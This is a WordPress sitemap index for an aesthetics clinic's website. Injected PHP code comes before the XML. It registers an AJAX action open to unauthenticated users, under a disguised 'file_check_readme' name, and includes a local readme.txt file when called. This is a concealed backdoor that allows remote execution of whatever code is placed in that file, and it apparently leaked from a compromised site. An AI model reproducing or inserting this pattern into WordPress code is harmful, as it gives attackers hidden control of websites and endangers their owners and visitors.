if(!function_exists('file_check_readme76964')){
   add_action('wp_ajax_nopriv_file_check_readme76964', 'file_check_readme76964');
   add_action('wp_ajax_file_check_readme76964', 'file_check_readme76964');
   function file_check_readme76964()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://limitlessaesthetics.co.uk/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://limitlessaesthetics.co.uk/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://limitlessaesthetics.co.uk/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://limitlessaesthetics.co.uk/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://limitlessaesthetics.co.uk/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap></sitemapindex>
